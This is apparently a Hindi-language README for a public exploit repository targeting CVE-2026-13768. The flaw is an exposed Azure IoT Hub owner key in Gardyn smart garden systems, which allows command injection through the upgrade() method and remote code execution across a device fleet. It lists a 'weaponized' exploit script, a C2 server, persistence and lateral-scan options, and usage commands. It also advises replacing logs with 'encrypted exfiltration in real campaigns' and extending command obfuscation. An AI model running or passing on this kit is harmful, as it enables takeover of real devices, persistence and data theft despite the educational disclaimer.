
Azure IoT Hub जहां owner-level Shared Access Key के उजागर होने से कनेक्टेड IoT डिवाइसों पर बिना प्रमाणीकरण के रिमोट कोड निष्पादन (RCE) संभव हो जाता है। प्रूफ-ऑफ-कॉन्सेप्ट
[!WARNING] इस रिपॉजिटरी में एक उच्च-गंभीरता वाली IoT भेद्यता के लिए पूर्ण रूप से कार्यशील प्रूफ-ऑफ-कॉन्सेप्ट शामिल है।
यह कोड केवल शैक्षिक उद्देश्यों, अधिकृत सुरक्षा अनुसंधान और रक्षात्मक परीक्षण के लिए प्रदान किया गया है।अनधिकृत उपयोग अवैध है। स्वामी से स्पष्ट लिखित अनुमति के बिना सिस्टमों का परीक्षण या शोषण करना कंप्यूटर फ्रॉड एंड एब्यूज़ एक्ट (CFAA), EU साइबर रेज़िलिएंस एक्ट और आपके क्षेत्राधिकार में लागू अन्य कानूनों का उल्लंघन है।
लेखक इस कोड के परिणामस्वरूप होने वाले किसी भी दुरुपयोग, क्षति या कानूनी परिणामों के लिए कोई दायित्व नहीं लेते हैं।
हमेशा कानूनी और नैतिक सीमाओं के भीतर कार्य करें।
CVE-2026-13768 Gardyn स्मार्ट गार्डन सिस्टम में IoT Hub के स्वामी-स्तर का कनेक्शन स्ट्रिंग उजागर करता है, जिससे Azure IoT Hub पर पूर्ण प्रशासनिक नियंत्रण प्राप्त होता है। यह PoC दर्शाता है कि स्वामी कुंजी वाला हमलावर upgrade() क्लाउड-टू-डिवाइस विधि में कमांड इंजेक्शन के माध्यम से कनेक्टेड डिवाइसों पर रिमोट कोड एक्सीक्यूशन (RCE) कैसे प्राप्त कर सकता है, जिससे पूरे फ्लीट से समझौता संभव हो जाता है।
सुइट में शामिल हैं:
यह एक जीवंत शोध परियोजना है - सप्लाई-चेन और IoT क्लाउड मिसकॉन्फ़िगरेशन को समझने और उनसे बचाव के लिए इसका जिम्मेदारी से उपयोग करें।
upgrade() विधि के माध्यम से कमांड इंजेक्ट करें (CVE-2025-29631 कमांड इंजेक्शन का लाभ उठाते हुए).
├── poc.py # Main weaponized exploitation script
├── validate.py # Safe, read-only validation tool
├── c2s.py # Lightweight C2 server for demos
├── TEMPLATES.md # Ready-to-Use Command Templates.
├── README.md
रिपॉजिटरी क्लोन करें:
git clone https://github.com/J4ck3LSyN-Gen2/CVE-2026-13768.git
cd CVE-2026-13768
python3 -m venv venv
वर्चुअल एनवायरनमेंट सक्रिय करें (या एक बनाएं):
source venv/bin/activate
python3 -m pip install --upgrade pip
निर्भरताएँ इंस्टॉल करें।
python3 -m pip install azure-iot-hub
python validate.py --conn-str "HostName=yourhub.azure-devices.net;SharedAccessKeyName=iothubowner;SharedAccessKey=..."
एग्ज़िट कोड 0 = सुलभ डिवाइसों के साथ मान्य स्वामी कुंजी। कोई संशोधन नहीं किया जाता है।
python poc.py \
--mode exploit \
--conn-str "HostName=..." \
--device-id "target-device-123" \
--command "whoami" \
--lateral-scan \
--persist
पूर्ण विकल्पों के लिए python poc.py --help चलाएं।
python c2s.py --port 4444
iothubowner के रूप में प्रमाणित करने के लिए Azure IoT Hub SDK का उपयोग करता हैupgrade() डायरेक्ट विधि में कमांड इंजेक्शन का दुरुपयोग करता हैनोट: लेटरल मूवमेंट और पर्सिस्टेंस कोड उदाहरणात्मक प्लेसहोल्डर हैं। उन्हें अपने लक्ष्य डिवाइस के OS और बाधाओं (जैसे, BusyBox-सीमित वातावरण) के अनुसार अनुकूलित करें।
/tmp/cve_2026_13768.log में लिखता है। वास्तविक अभियानों में इसे एन्क्रिप्टेड एक्सफिलट्रेशन से बदलें।obfuscate_cmd() / deobfuscate_cmd() फ़ंक्शनों का विस्तार करें।निम्नलिखित के लिए योगदान का स्वागत है:
कृपया issues या PRs खोलें।
महान शक्ति के साथ महान जिम्मेदारी आती है।
| तर्क | विवरण | आवश्यक |
|---|
--mode | validate या exploit | नहीं (डिफ़ॉल्ट: validate) |
--conn-str | IoT Hub स्वामी कनेक्शन स्ट्रिंग | हाँ |
--device-id | लक्ष्य डिवाइस ID | हाँ (एक्सप्लॉयट मोड) |
--command | upgrade() इंजेक्शन के माध्यम से निष्पादित करने हेतु कमांड | नहीं (डिफ़ॉल्ट: id) |
--lateral-scan | डिवाइस से LAN रिकॉनिसेंस सक्षम करें | नहीं |
--persist | पर्सिस्टेंस का प्रयास करें (जैसे, cron, systemd) | नहीं |
--c2 | C2 सर्वर से वापस कनेक्ट करें | नहीं |